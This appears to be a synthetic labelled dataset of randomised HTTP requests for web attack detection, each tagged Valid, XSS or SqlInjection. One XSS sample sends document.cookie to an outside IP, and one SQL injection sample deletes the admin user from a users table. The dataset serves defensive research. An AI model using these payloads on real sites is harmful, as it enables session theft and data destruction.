X-Forwarded-For: 181.137.254.3
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24614
Start - Id: 20098
class: Valid
GET /egb/lTsT/onybtis/aeNr/3PfnTmgtOP-rgckrOK/crHtloe6Sn/o-NBdai8W.vRzTgCO/irosal0y/FRvtmpY.@M0ocs/ih7yuAe1lon.pl? HTTP/1.0
Host: 51.98.171.30:80
Connection: Kaazecc
Accept: text/xml
Accept-Charset: koi8, iso-8859-2, x-mac-ce;q=0.5, windows-1250;q=0.8
Accept-Encoding: *
Accept-Language: amumtt-iwd0, tbozen-ju, r4a-tharoe
Cache-Control: no-cache
Client-ip: 89.56.70.121
Cookie: ec=ytur wie)aeu;1m6tedtlosEnrrt=5;sPmrAltTe=oyqi;Unrlnh9yesqd=manttmpmo|w>3i|\toh;ac2pAegliihaMNi=e eiari8lsa;PT45.Omd21hb=07918
Cookie2: $Version="6"
Date: Fri, 28 Jul 06 21:10:34 CET
ETag: W/"Doc_wnLIk4UP5wAFj"
Expect: i2covij1
From: alaua@llalec.uk
If-Modified-Since: Sat, 02 Jan 10 06:51:37 CET
If-Unmodified-Since: Wed, 14 May 08 07:57:35 CET
If-Match: *
If-None-Match: *
If-Range: "GTpceOm3.Q2u07y3"
Max-Forwards: 3591
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c3Njc29kZjo0clRydA==
Authorization: Basic c1Noc2VzYnA6ZXNzYmRp
Range: 41-,-67213
Referer: http://scilkgn4.be/coeb.pl
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: dF5EP-g55@ http://www.rBhmrTft.fr
UA-CPU: Sparc
UA-Disp: 894,918,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5910x691
Via: HTTP/0.6 www.iejahlmp.html, 4.4 130.116.94.253
Transfer-Encoding: eotroe
Upgrade: uce/2.3, tNT/0.5, 4Yfn/7.0, chae/1.4, ye1/1.6
Warning: 223 241.60.75.35 "5tsnebAiy" 
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20098
Start - Id: 19736
class: Valid
GET /ofLwh9CJeC/rp9Rw_oCiAn/dnnrmrhgesetaeEh3eu/TIiframenhavingnEG/0dtJQ_aauAt.p/txKIdC4tVltm3/eReEgu/7HuZd-mz/lwIr.uMW2.bin?jvnVl7w2IM4E=%3Brevalr1&se=atdf5wtAmnooleeu&cqeierpee=eeeezsr&d5TtTlisiqsg8gn=05ciebteav&ierSups7l6uOe=5598&w9ahs2immrp=eteritofplft&dbiTddn=vduesroooetwe&ltai1scfshc=%26i%24airB9%5D%3Fe%290sI&iot2ymemqg2te=ai HTTP/1.1
Host: 210.192.196.127
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: E='ng'
Client-ip: 207.179.57.163
Cookie: 0catxA=7]>;rautH=59740;rEe=Jhaving
Cookie2: $Version="96"
Date: Sun, 11 Feb 07 14:28:52 CET
ETag: "G97@SWhNAQ2vuI4I"
Expect: gcbr
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Mon, 17 Oct 05 02:35:36 GMT
If-Unmodified-Since: Thu, 11 Feb 10 13:13:19 GMT
If-Match: *
If-None-Match: "4akf37QJE@AE5_6"
If-Range: *
Max-Forwards: 7154
MIME-Version: 8.6
Pragma: zi=yoiAi1i
Proxy-Authorization: NTLM aWVyN3VzaG8wbmhjaGNhb214SW9uN2FldHMzTWl0c2RvYW4ya2lIcGQ=
Authorization: NTLM aHN0TTllZGVvdGdjODhhYXJvbnRiYnNzSHlFcGVjb2Nh
Range: 4774-
Referer: /nvtCst6b/thnhh.dll
TE: trailers,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Windows; U; WinNT 2.4; re-wl; rv:4.7.8) Gecko/35969617
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4663x150
Via: HTTP/7.5 www.aepnie.html, FTP/4.8 81.103.48.185, 7.5 203.119.106.210
Transfer-Encoding: tstpi1
Upgrade: onsjt/4.9
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19736
Start - Id: 8878
class: Valid
GET /mj0pPiframe2Xz/GehretKhsps/6M4gMUzJoixW/eQyfT-YJL.asmx?tufl3=83327532&taoaepytn=%40d&4mdamdewosty=9784429&Fdbodys0i3sock_stream=ditJr&tsteee=0580&etaiI3dee=tte&KL2tNW=drsrd&sauha=bgsound&0nC=sw5&sWilC2ZDe7B=firetaase1a&slyb=%3Azhatte7l%5Cbo&ton=53055&utrra=asv%26f+rl0xOf HTTP/1.1
Host: www.fpvrNtir.ch
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.6, gzip;q=0.7, gzip
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 36.44.215.228
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="1"
Date: Sun, 18 Dec 05 14:34:19 GMT
ETag: "gk1RxozSldqS1ixREt"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Fri, 23 Jun 06 24:13:18 GMT
If-Unmodified-Since: Thu, 05 Feb 04 20:34:00 GMT
If-Match: *
If-None-Match: "FjFLAES@Vd693cux"
If-Range: *
Max-Forwards: 3624
MIME-Version: 2.8
Pragma: 7ce1meen=y4tecais
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: NTLM am9jV3NsRUR5czhpNTBjaTZvY3lvZG9TaW1obG90ZUQ4aQ==
Range: 85-
Referer: /qoaon/adoefltl/h3f8t.bin
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (Windows; U; WinNT 0.8; Eo-or; rv:2.8.1) Gecko/25894258
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3568x0188
Via: 2.2 www.luior.jpg:34, 9.4 www.shseknfp.jpg, HTTP/6.6 131.175.60.70:08106
Transfer-Encoding: compress
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 595 34.218.228.95 "fFoep9Eetebeekisett" "Mon, 07 Jun 04 13:30:19 CET"
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8878
Start - Id: 16333
class: Valid
GET /9Y54N6T@EeaXXscLNYP/onaaoe8thso3/1ri3nTplftoAe.asmx? HTTP/1.1
Host: www.copahozebc.fr:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: t-civlnn, yk8iK23r-ihTe, ynzK-ae6en;q=0.7, nahugDsn-r7ia;q=0.0, ceetea7-sieitu
Cache-Control: max-age=5631
Client-ip: 33.226.87.182
Cookie: ninernsN=ittph;9lduaEa=loHalei)ei0
Cookie2: $Version="54"
Date: Thu, 06 Oct 05 17:37:19 UTC
ETag: W/"h8Glbc5alMI0GkzIQG"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Thu, 15 Oct 09 07:59:09 GMT
If-Unmodified-Since: Thu, 11 Sep 08 06:50:19 UTC
If-Match: "8p7qhYkM_XLnn5t2an"
If-None-Match: *
If-Range: Fri, 15 Apr 05 11:41:11 UTC
Max-Forwards: 2
MIME-Version: 7.6
Pragma: 84='pu'
Proxy-Authorization: NTLM cnZ5VWV0ckhpeHRrYU5pZWhuc2ltcGNodGVoZHRvaTNhaHNtbml1ZWVs
Authorization: Basic a3RzYXd0bjptd0lhdUVi
Range: -652120,9-,091-
Referer: /z6oixo.exe
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 3.7; to-1c; rv:4.9.0) Gecko/17130279
UA-CPU: Sparc
UA-Disp: 766,2027,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 514x2901
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: p8edt
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 145 www.Bgmiwi.jpg "Srb0yn2enUsienetl" 
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16333
Start - Id: 46754
class: XSS
GET /OgloS/eO3Vj92q7Uw50NK/HxFYI/2Gu.z/dttPae7epqe7erinmTe/ot0bDt/oxwppBHGF/vHb7xgBy_BS.xkvG.png? HTTP/1.1
Host: 60.132.188.192
Connection: keep-alive
Accept: text/*;q=0.6, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-stale=05336
Client-ip: 118.119.5.57
Cookie: ose4ee=j;9aAOes0dzhwwr=tconnectc:Eoihprocessing-instruction$aNs;aefoue6p=2;laRde=<style     type=    "  text/javascript  ">[window.open('http://253.119.3.45/rora.nsf'+document.cookie);]</style  >
Date: Sun, 03 Aug 08 04:48:54 UTC
ETag: W/"5.aeov5zPfS@dF0CZr"
Expect: 100-continue
If-Modified-Since: Tue, 30 Dec 08 22:47:35 CET
If-Unmodified-Since: Mon, 30 Apr 07 14:24:05 GMT
If-Match: "7z2XFHfTX5Qag_6jlQDw"
If-None-Match: "1WcNA@ENd6qzkmVF6"
If-Range: Thu, 24 Aug 06 09:34:08 GMT
Max-Forwards: 17
Pragma: no-cache
Proxy-Authorization: Basic a2hzZG06MHpzbGI=
Authorization: NTLM MW5oTmh0dHZjdGNmY3J0bmdscmVwQVFlYXNXdGxvb2Rzcm9vbmN1c25N
Referer: http://noafn.ch/hzoom/Mftr/ae2Dea.cgi
TE: trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 7.0; tt-s8; rv:3.7.5) Gecko/86993352
UA-CPU: StrongARM
UA-Color: color8
Via: 0.4 76.187.253.154
Transfer-Encoding: compress
Warning: 249 www.fwhwk.htm "usscchornmwtEs1afes" 
X-Forwarded-For: 12.112.216.2
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46754
Start - Id: 18647
class: Valid
GET /a@vF@-c/o3ego9EjWeY6hreeg/e9ZF4wSrqbS3.6O2/FAmailZu8/auAsq5rt5esd1zoosie3.shtml? HTTP/1.0
Host: 186.33.56.109
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 86.71.254.247
Cookie: zwindow.open8n=l4YN_jw;m2@7httpg1Bnull=l_O;lirjtvrvm0segT=o;iii2elo=t2t;aagiqph8dTdcc=j.lX2aznmJuc
Cookie2: $Version="5"
Date: Fri, 03 Aug 07 10:02:37 GMT
ETag: W/"-T4eoO3.CDM2BJMSY"
Expect: Naud=docmmtt;rdrdTo
From: dhoiTi@6ndiEy.ch
If-Modified-Since: Thu, 14 Sep 06 10:41:26 CET
If-Unmodified-Since: Fri, 13 Jan 06 10:06:26 UTC
If-Match: *
If-None-Match: "PqfnC_J@GBihHQbKbU"
If-Range: *
Max-Forwards: 3
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZTlyb3RJN3hybWVhdHBkYVVhbzVhbjB0YTZydmV0cWhzaXJsZmVFdWl3aWl6eWlm
Authorization: Basic dGxwcGFlcjplc2kyeHJ2
Range: -0
Referer: http://a73tl.org/uul2/zunr/eideieh/frie/todneqer.cfm
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 7.3; Ne-xa; rv:2.5.7) Gecko/33420640
UA-CPU: x86
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8027x0405
Via: 1.8 185.239.133.174, 4.2 145.14.210.115:7642, FTP/9.0 33.98.251.163
Transfer-Encoding: aqasq; rtas0o4=x6Eo
Upgrade: fho/0.2, sxc/0.2, lsms2/6.1, 9dw/7.6, aerhy/4.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18647
Start - Id: 28556
class: Valid
GET /sEY_JP-MkFZ/ahe6/noVD/tKUK-o/0aytiggET/gee9Shlndco7aester2e/trerE0/cVJ./fA/8tmbhig/Gnclsxp_.png?o7ddl=b7&h5fOruerdrn=17478&Z6N.-LMRYbxh=44025 HTTP/1.0
Host: www.etlmh.gov:80
Connection: close
Accept: application/x-tar, application/x-tar, application/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: se-erehB;q=0.8, hmeeeee-br;q=0.4, vte7d-i, mhuhouS7-tttoa3;q=0.7, hbmth-q7eYiocd;q=0.3
Cache-Control: yisrD=lana
Client-ip: 108.74.4.29
Cookie: etn=seu8mia
Cookie2: $Version="654"
Date: Wed, 12 Oct 05 22:36:29 GMT
ETag: W/"K45FpoeZ6ZUmyGN"
Expect: 100-continue
From: ekkeeGea@9uAbioy.it
If-Modified-Since: Wed, 19 Sep 07 09:01:57 GMT
If-Unmodified-Since: Sat, 27 Nov 04 19:53:18 CET
If-Match: "za@Llkj6JP0RnC3_"
If-None-Match: *
If-Range: Wed, 05 Jan 05 08:59:44 UTC
Max-Forwards: 2589
MIME-Version: 8.0
Pragma: yekct='ag'
Proxy-Authorization: Basic c3RyZ3R5bnM6bmEyag==
Authorization: Digest cnonce="5Sesq"
Range: -485791
Referer: http://www.wnIieuei.be/bhohtel/ali6elbh/perm/4awr/Dtiatj.asp
TE: chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: yR29haAil http://www.panliir.st
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6545x8948
Via: FTP/3.2 56.167.210.205, RstLzt/8.1 115.141.233.221:29, 6.3 www.aoieD9l.htm
Transfer-Encoding: identity
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28556
Start - Id: 24822
class: Valid
GET /iOIQ0ORAPaccess_logb/hXisNS-RsKcRxpYzSFws/mp/nFflQhLAjm8U5RxXRu/aFazykLYVqc3j/wfsQNp-F/tlF2fUDzA9Cf7S.po7-N/XNwinntBDwkmocha.asmx?iatF-VC1=01586&wdntnhuixtyeo3=opetl+0&kXFdAOrhtf=%25syEf%5Cz%7EiHepEsadmm HTTP/1.0
Host: 204.159.89.164:102
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.0, iso-8859-1;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: cnepd='ae0t'
Client-ip: 63.224.181.72
Cookie: otlo=61216815;FIcn=nseoca;rmUK5M1=DmumnuhttpIndsoeqi;etdm2dtdtposrs=sCzqVX0KaOjM;-pkQVbinphpRhservicesX=f3JFBwk
Cookie2: $Version="951"
Date: Sun, 09 Apr 06 02:15:01 CET
ETag: W/"NWe3SuCEUkTpzis"
Expect: 100-continue
From: iesi0goR@Pnih.ch
If-Modified-Since: Fri, 25 Jun 04 04:02:26 UTC
If-Unmodified-Since: Tue, 11 May 04 24:32:30 UTC
If-Match: "gxiRxOc.kjHnG3@sP"
If-None-Match: "D0aB7PqN31Ii95k"
If-Range: Thu, 15 May 08 14:18:37 GMT
Max-Forwards: 6046
MIME-Version: 0.0
Pragma: f=e
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: Basic aXRzbmNhOm4xaFB6Nw==
Range: 89-,-8
Referer: /y9ao/rnceze4c/erbe/uiudrg.doc
TE: chunked;q=0.0,chunked;q=0.1
Trailer: Date
User-Agent: Mozilla/0.5 (Windows; U; WinNT 5.2; xt-lr; rv:7.7.1) Gecko/86038523
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 577x412
Via: HTTP/7.7 www.82wutt5l.css
Transfer-Encoding: compress
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 242 103.81.240.13 "nIooeeg" "Mon, 29 Aug 05 22:00:16 CET"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24822
Start - Id: 25354
class: Valid
GET /lmOa7atwVecIntt/oQ03WutH5Nx33fHLN-/tsnm6ULhcuemfthbh/e9TUb_a@834L4/moL/nd/mHK/eEvlYpTuQ-Y/QobjectZnXGXhx.mdb?onb=98734699 HTTP/1.0
Host: 36.24.255.123
Connection: nots
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: es-fnui44uu;q=0.2
Cache-Control: only-if-cached
Client-ip: 116.248.127.206
Cookie: esHi=eeutqaoib5ma;uje=8066;F2Di5n=o3%/e>sla;uiihssh8nehrent=iya
Cookie2: $Version="094"
Date: Tue, 06 Apr 04 08:32:35 GMT
ETag: W/"H-nR_fhu2JQLg5Kk35B"
Expect: 100-continue
From: 5tiby@ird1trmU.net
If-Modified-Since: Mon, 05 Apr 04 14:18:28 CET
If-Unmodified-Since: Mon, 29 May 06 20:25:28 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 11 May 05 06:32:45 UTC
Max-Forwards: 45
MIME-Version: 6.1
Pragma: tiawe=fazs0h2c
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: Digest qop=auth
Range: 4947-
Referer: http://nnalo.ch/i3tt2lv/atioYtme/nRtptet/Hldhoc/dkMH.txt
TE: deflate;q=0.7,trailers,deflate
Trailer: From
User-Agent: sbjn4frcst5v9mlsi
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 894x439
Via: ettp/0.9 www.ontOR.html:340, 8.3 www.seett.jpeg, 5.6 www.Nloic.htm
Transfer-Encoding: identity
Upgrade: 5itIE/7.2, iAlg/7.5
Warning: 127 197.55.244.77 "fosrtaeywgeT" 
X-Forwarded-For: 149.199.155.11
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25354
Start - Id: 24989
class: Valid
GET /3o9vsi9Stt/hXi@c0FPvm/nietrt1Taner1/Qv.exe?uhntlTtSnwbuAe=rrE&s9hitliyui=dp&openlBCrwaccess_log.fnCG=mmncentnsatx&hieeerkeante=029175936&el=930298059&trentuiug=nT%3F%3Ba&azcnttrtt=8+sne%7Cooxysnmmail&nAiteha=iitisr&m6=3ie%28l&nedusnCns=29 HTTP/1.1
Host: www.weeb.it
Connection: close
Accept: text/*;q=0.1
Accept-Charset: x-mac-ce;q=0.2, isiri-3342, utf-7;q=0.7, windows-1252;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: hlhv-ahteot;q=0.3, zO-mn
Cache-Control: max-stale
Client-ip: 19.99.109.42
Cookie: br4onrvmemijnt=ai1id;tte9algosoN=systemm
Cookie2: $Version="88"
Date: Tue, 14 Aug 07 11:23:28 CET
ETag: W/"CvQ_dK.kzcRNGW9HuX"
Expect: aonor
From: ipnejdn@dgaeae.gov
If-Modified-Since: Wed, 09 Jan 08 11:14:49 CET
If-Unmodified-Since: Sat, 31 Mar 07 03:14:12 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Dec 07 20:26:00 UTC
Max-Forwards: 7693
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=80E9BD9d
Authorization: NTLM c2lkdGZ0ZW5UN29laGVldWRzaHRlaWxlb2J0dm5TdTBrN3RNaA==
Range: -67,790189-2941
Referer: http://24w6a.biz/ldZnatv.jpeg
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.7 (Windows; U; WinNT 3.7; i2-tE; rv:3.7.7) Gecko/58399277
UA-CPU: x86
UA-Disp: 4621,3204,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 669x906
Via: HTTP/9.1 189.203.77.236, 3.3 206.66.31.215, tsrs/6.2 142.159.179.12:04
Transfer-Encoding: identity
Upgrade: ttwss/6.4, hfsue/2.6, scs/4.5, hecCt/7.3
Warning: 455 158.166.248.85 "sol2reua6sehmtdo" 
X-Forwarded-For: 254.29.12.40
X-Serial-Number: 4634746
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24989
Start - Id: 4909
class: Valid
POST /gtissisfeuae/6Sy7evg4ahdnoFs/afDLd1/tETCr1lc8scoB/vXOKNG8xmlunK./FkazUftprcp/systemGLcmdF3stdin/u2wttteO.pl? HTTP/1.1
Content-Length: 239
Content-Language: e
Content-Encoding: compress
Content-Location: /scanko4/aitn1s/xigu/LlR0.dll
Content-MD5: YmV0ZUR0ZXQxZUJpbzBmaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 07:36:20 UTC
Last-Modified: Tue, 24 Feb 09 03:51:56 CET
Host: 49.40.242.78:80
Connection: close
Accept: application/postscript;q=0.1, application/postscript, text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 165.127.88.109
Cookie: qEgohee=ac;6b=qa1delete7;hqL42inpImkiq=Tu nt;Hsdc=41488;niaysoiidtoulwc=9802995984;qldT29tqmr=3tdlIRtIejsrh5rfet
Cookie2: $Version="9"
Date: Sat, 05 Jan 08 11:56:51 UTC
ETag: "gocflTTvp1OfV1Ur"
Expect: 100-continue
From: eban@aMheygk.fr
If-Modified-Since: Sat, 26 Apr 08 11:04:24 UTC
If-Unmodified-Since: Tue, 19 Oct 04 09:37:33 CET
If-Match: "jHIGPrShmUIn0TUREf"
If-None-Match: *
If-Range: "ZS-7TtmgS1ssNoYolZ."
Max-Forwards: 118
MIME-Version: 4.1
Pragma: ado5e=9
Proxy-Authorization: NTLM b2JhYWVkb2VkekgweEU4eGRpbWxobnNtdHRmdWV0SG9lRGl0MWVRdA==
Authorization: Digest response="E0BeA0d67c03c8Ba26b21997CDa24fb9"
Range: 0401-,-401,485260-5
Referer: /gvl6jm.avi
TE: trailers,trailers,chunked
Trailer: Date
User-Agent: lrraRreod/9.4.8
UA-CPU: x86
UA-Disp: 085,1074,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5493x774
Via: 6.4 153.199.44.8, HTTP/1.7 www.eion.gif, 5.2 248.180.107.32
Transfer-Encoding: deflate
Upgrade: cAle/7.3, niilm/1.6
Warning: 089 www.y3btxe.jpeg "tnngrttahsrrneaYij" "Wed, 29 Oct 08 22:55:29 UTC"
X-Forwarded-For: 89.218.230.173
X-Serial-Number: 074898
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntah44rnelatEt=mt&botdrRwahtma=taeoqiiate&xS4shutdownb=tdthand&5thshlloiav=<&nsho=179042&naippt=ai?e@&c2scaTanh=5779&tD=ohsa2be@lodaccess_loga'acywp-aa&atEtdtrdmi=eIanefocc&xrOeakfee4=s6n &chtqymjrlh=eshutdown4u7&elhter=fibieytot

End - Id: 4909
Start - Id: 15706
class: Valid
GET /dUmtsHeXv5zsed7p1/XQt8/bN54edOEBWw.LUI/Oy_69X4UctcEJ/eXVK@ICo/o3e/sethewSetseyi1peen/hoi/moat/hattflSpu/e8nfaomeHhtMNtsil/nVPAC87rgCLy.php3?1COJovN=cata%2B&Ao90tntgrouo=oe&ht=syWfGRHZv9j&T1aWn74=8712&dba05itnnpp9=brape4tmpEeIt%3EnSjhaving%2B HTTP/1.0
Host: 7.113.152.56
Connection: tuunnra
Accept: */*
Accept-Charset: koi8;q=0.2, windows-1253, big5
Accept-Encoding: 
Accept-Language: ch1h-tng, EMnnf-m, crk-neistr, rueepiu-flrtar0p;q=0.5, wet-pnoahf;q=0.2
Cache-Control: max-stale=8
Client-ip: 136.105.214.240
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="81"
Date: Wed, 14 Jan 04 04:12:05 UTC
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Mon, 29 Nov 04 21:34:36 UTC
If-Unmodified-Since: Wed, 21 Jan 04 23:37:59 CET
If-Match: "aL-M36byck8VJfx.kLwe"
If-None-Match: "79tYyoyJ1Zp1QC8OiGw9"
If-Range: Tue, 14 Apr 09 20:32:37 CET
Max-Forwards: 3246
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: ilie a4w9w=thndvf
Range: -2
Referer: /jzosn/pgpclvt/adycshu.gif
TE: gzip
Trailer: Upgrade
User-Agent: rEocl (eJWWSh0; 5vLB0W3g-n; d-k5_D2xZa; e4N13BAE; ciM4.8X)
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/3.4 249.83.18.65
Transfer-Encoding: oEEkus
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 9307845835407773
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15706
Start - Id: 12411
class: Valid
GET /nuhutGNvQriy_xu15k/mNowHZvbscriptyA.asmx?eSzOea=gI_y&itTeatoo=eo&Ae03neo=tts1aroke%3A8hstdinnraophp&n8Qe=ro.32ilGG&zhknatrrdnta=4&mZswntl=2&t50voIingg=5971032598&seieDtPectmeucr=tnOniyasR5Dn&eaTljhvtttr=%24oYhw HTTP/1.0
Host: 73.70.155.232
Connection: keep-alive
Accept: text/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, compress, identity, gzip;q=0.0, deflate;q=0.8
Accept-Language: b-soj, s-mn;q=0.8, aIi-6iieh;q=0.0
Cache-Control: no-transform
Client-ip: 93.127.207.207
Cookie: mi=63197;7lq=2
Cookie2: $Version="23"
Date: Fri, 17 Nov 06 01:19:52 GMT
ETag: W/"bwj.1qI6pKy-i7GX"
Expect: 100-continue
From: yiBv9i@mndhmfHee.st
If-Modified-Since: Mon, 18 Jan 10 13:02:14 CET
If-Unmodified-Since: Mon, 22 Aug 05 10:07:29 GMT
If-Match: *
If-None-Match: "P@OZ5pCL2w_7yl-j"
If-Range: Tue, 02 Oct 07 18:27:48 CET
Max-Forwards: 9165
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: NTLM ZHFYY1JTZW1zYWVoU0g5c2lzZGFzUDlzcmhjb25vamxiRWl0c29ueXFEOWI0aWVm
Range: 669-,4825-
Referer: /lhoxUa/swe6/rr6d.mpg
TE: trailers,chunked;q=0.6,deflate
Trailer: Host
User-Agent: aeerorz6cRdemear
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7091x4892
Via: hbdss/6.2 113.9.156.247:77425
Transfer-Encoding: deflate
Upgrade: neuch/5.4
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 200058201
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12411
Start - Id: 41883
class: SqlInjection
GET /soynqzaodeanda/@2fxCn/s6tvwfjpabrw/iUy/yh6umeuvhLMtmahsrBo/tboPsKmIFhVnQ9PGz-/p.gtiSa1z-Gb3i_3lCN/Dtuee0hlmu2lmt4.tiff?xJqX4aS=oMiWCakx&dhn=uQmY%27++%29%3BDELETEFROMusersWHEREupper%28username%29++++%3Dupper%28++%27admin&htrncclxfd9tir=+%3F&g4ZiEstdin=withtpassnsdnvcmg&Eq9C90kldeleteNoG=1851&eEzke2=ohl9eeLot&fTrl=954&soen=rw+&w9F3Pr=eshS HTTP/1.0
Host: 99.249.215.141:2
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic;q=0.7
Accept-Encoding: deflate;q=0.6, gzip, compress
Accept-Language: 2fApo-bj3daar, leaiJ-qiiia4r
Cache-Control: max-age=9
Client-ip: 203.18.145.66
